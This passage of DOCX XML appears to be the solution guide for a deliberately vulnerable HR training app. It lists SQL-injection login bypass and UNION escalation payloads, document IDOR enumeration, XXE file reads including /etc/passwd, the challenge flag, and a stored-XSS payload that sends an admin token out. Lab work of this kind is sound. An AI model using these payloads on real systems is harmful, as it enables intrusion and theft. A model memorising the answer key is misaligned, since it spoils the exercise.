          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>WHERE u.username = '${username}' AND u.password_hash = '${password}' LIMIT 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Blind bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (proves the bug, but lands on a low-privilege account on purpose):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>username: x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">password: ' OR '1'='1' -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There's no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIMIT 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns SQLite's natural row order — whichever account was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>inserted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> first (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>seed/generators/accounts.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seeds Employee/Manager seats before Administrator ones, specifically so this doesn't trivially grant admin).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Escalation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — grab the highest-privilege real account directly, no prior knowledge of any specific username or employee ID required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">username: ' UNION SELECT user_id,username,role_id,employee_id,1,(SELECT name FROM roles WHERE roles.role_id=users.role_id) FROM users ORDER BY role_id DESC LIMIT 1 -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>password: x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This assumes a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> table with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> foreign key to a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> table — a very standard guess for anyone with SQLi experience, and confirmable by trial. The correlated subquery pulls the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> role name (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(SELECT name FROM roles WHERE roles.role_id = users.role_id)</w:t>
      </w:r>
      <w:r>
        <w:t>); a hardcoded placeholder string here would break the session’s RBAC, since the role name — not the numeric ID — is what the app checks capabilities against.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A simpler, cruder alternative that also works: brute-force </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WHERE role_id = N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1..9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (there are exactly 9 roles) and check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/api/peoplehub/me</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after each attempt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 — Employee Directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/peoplehub/employees?search=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — every dropdown filter is parameterized; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is concatenated. The result set has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>13 columns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>employee_id, first_name, last_name, preferred_name, job_title, department, managerFirst, managerLast, location, employment_type, employment_status, join_date, job_grade</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">search: x' UNION SELECT 'x','x','x','x','x','x','x','x','x','x','x','x','x' -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Requires the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capability — HR Helpdesk, HR Manager, Payroll, IT Support, Security, Manager, or Administrator. Escalate first if you're still on the blind-bypass Employee account.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 — Employee Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/peoplehub/employees/:id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the URL segment is concatenated into the WHERE clause. The query is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SELECT e.*, d.name AS department</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, i.e. every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>employees</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> column (21) plus department (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>22 columns total</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/peoplehub/employees/x' UNION SELECT 'x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x','x' -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 — People Analytics → Reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/peoplehub/reports/:id/run?segment=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the segment filter is concatenated. Result shape is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3 columns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dimension, metric_name, metric_value</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">segment: x' UNION SELECT 'x','x','x' -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Requires the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>reports</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 — HR Requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/peoplehub/hr-requests?search=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — same pattern as Directory, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>9 columns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>request_id, employee_id, first_name, last_name, category, subject, priority, status, created_at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Unlike Directory's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where[0]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, there is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no extra wrapping paren</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to close here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">search: x' UNION SELECT 'x','x','x','x','x','x','x','x','x' -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.6 — Document IDOR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Documents → the list view is correctly scoped (your own documents + company-wide ones only) — browsing normally never reveals the bug. The detail route (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/peoplehub/documents/:id</w:t>
      </w:r>
      <w:r>
        <w:t>) only checks classification→role access, never ownership, for personal document types (Employment Contract, Compensation Letter, Performance Review, Leave Approval, Onboarding, Offboarding, Benefits, Training).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-admin, non-HR-manager account, request a document ID that isn’t in your own list (e.g. try IDs sequentially — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>documents.html?id=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>?id=2</w:t>
      </w:r>
      <w:r>
        <w:t>, …). Any personal document belonging to someone else that comes back is the discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.7 — Employee Data Import (XXE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Administration → Employee Data Import (Administrator-only). Real DOCTYPE/ENTITY parsing (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib/xxe.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), sandboxed to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenge-data/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on disk — never the real filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Decoy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (confirms the technique works, teaches nothing sensitive):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE employees [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;employee&gt;&lt;name&gt;Test&lt;/name&gt;&lt;role&gt;&amp;xxe;&lt;/role&gt;&lt;note&gt;x&lt;/note&gt;&lt;/employee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The real chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — one file at a time, each pointing to the next:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///challenge-data/hr/migration-notes.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → mentions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hr/directory-sync.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///challenge-data/hr/directory-sync.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → mentions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>config/import-settings.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///challenge-data/config/import-settings.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → mentions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>archive/migration-history.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///challenge-data/archive/migration-history.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contains the emergency access code: `BLACKOUT-7`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload shape (swap the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identifier for each step):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE employees [&lt;!ENTITY xxe SYSTEM "file:///challenge-data/archive/migration-history.txt"&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;employee&gt;&lt;name&gt;Test&lt;/name&gt;&lt;role&gt;Engineer&lt;/role&gt;&lt;note&gt;&amp;xxe;&lt;/note&gt;&lt;/employee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenge-data/reports/legacy-report.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a dead-end decoy — old, superseded headcount data, mentioned nowhere in the real chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.8 — Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Help &amp; Support → "Share Feedback with HR". The review-queue preview renders submissions via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, unescaped. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>window.__ADMIN_SESSION_TOKEN__</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is loaded on that page only. Plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tags don’t execute via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>; an event handler does:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="fetch('/api/peoplehub/feedback/capture',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({token:window.__ADMIN_SESSION_TOKEN__})})"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Submit it, and it renders (and fires) immediately in your own browser’s preview — this lab simulates "an admin views it" by rendering the same unescaped queue back to the submitter, since a real second-admin-session demo isn’t practical here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.9 — Emergency Access</w:t>
